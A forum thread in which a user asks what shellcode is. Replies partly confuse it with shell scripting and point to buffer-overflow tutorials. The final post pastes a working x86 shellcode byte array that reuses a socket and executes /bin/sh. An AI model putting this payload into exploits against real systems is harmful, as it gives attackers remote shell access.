Shellcode
Results 1 to 6 of 6

Thread: Shellcode

  1. #1
    Member
    Join Date
    Jul 2002
    Posts
    65

    Question Shellcode

    I've noticed that a alot of exploits use shellcode to execute code as the UID of the server/program. Could someone please explain or give some references as to what shellcode is and how it works? What is the relationship between shellcode and assembly? Any info on the topic would be appreciated, thanks.

    --Sudo

  2. #2
    Member
    Join Date
    Jul 2002
    Posts
    50
    When you say shell code you mean shell scripting?

    Shell scripting in Unix is like writing batch files in Windows but much more usefull. It would be useful to read shell man page (eg. if you using bash then type "man bash").
    I don't see any relationships between assembly and shell scripting.
    I recommend that you read http://www.tldp.org/LDP/abs/html/.
    Give man a fish and he will ask for more.
    Teach man to fish and he will never ask again.
    \"Chinese proverb\"

  3. #3
    Junior Member
    Join Date
    Jul 2002
    Posts
    20
    Well just a search on google will give you this results:

    http://www.shellcode.com.ar/docz/bof...efmt-howto.txt
    http://www.phrack.com/show.php?p=57&a=5 (WRITING SHELLCODE FOR IA-64)
    http://www.w00w00.org/files/shellcode/ ( Index of /files/shellcode )
    http://www24.brinkster.com/neolabs/p...shellcode.html (Programming a shellcode in SCO)
    and etc...

    I hope this wouldn't be used for illegal ativities.

  4. #4
    Senior Member
    Join Date
    Aug 2001
    Posts
    259
    Assembly is a programming language, some might say it's THE programming language, it's about as close the machine as you can get without useing 1's and 0's. Shell scripts are just scripts that are interprited by the shell you are useing. Shell scripts are great for automating tasks on a *nix box and interfaceing with pearl.
    Alternate realities celebrate reality. If you cant handle the reality your in, then you wont be able to handle the one your attempting to escape to.

  5. #5
    Senior Member
    Join Date
    Jun 2002
    Posts
    165
    i don't know how much detail you are looking for, this article may be of service at a very low level for your last question:

    http://droby10.addr.com/tutorial/bof/appendage1.html
    -droby10

  6. #6
    Member
    Join Date
    Jul 2002
    Posts
    65
    When you say shell code you mean shell scripting?
    No, When I say shellcode, I do not mean shell scripting. Here is an example of some shellcode:

    char shellcode[] =
    "\x89\xe2\x83\xec\x10\x6a\x10\x54\x52\x6a\x00\x6a\x00\xb8\x1f"
    "\x00\x00\x00\xcd\x80\x80\x7a\x01\x02\x75\x0b\x66\x81\x7a\x02"
    "\x42\x41\x75\x03\xeb\x0f\x90\xff\x44\x24\x04\x81\x7c\x24\x04"
    "\x00\x01\x00\x00\x75\xda\xc7\x44\x24\x08\x00\x00\x00\x00\xb8"
    "\x5a\x00\x00\x00\xcd\x80\xff\x44\x24\x08\x83\x7c\x24\x08\x03"
    "\x75\xee\x68\x0b\x6f\x6b\x0b\x81\x34\x24\x01\x00\x00\x01\x89"
    "\xe2\x6a\x04\x52\x6a\x01\x6a\x00\xb8\x04\x00\x00\x00\xcd\x80"
    "\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe2\x31\xc0\x50"
    "\x52\x89\xe1\x50\x51\x52\x50\xb8\x3b\x00\x00\x00\xcd\x80\xcc";

    Thanks for the links Droby and Cicatrix. It looks like some heavy stuff.

    Originally posted here by Cicatrix
    I hope this wouldn't be used for illegal ativities.
    No no no... I am just a VERY curious guy.. Thanks.


    --Sudo

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •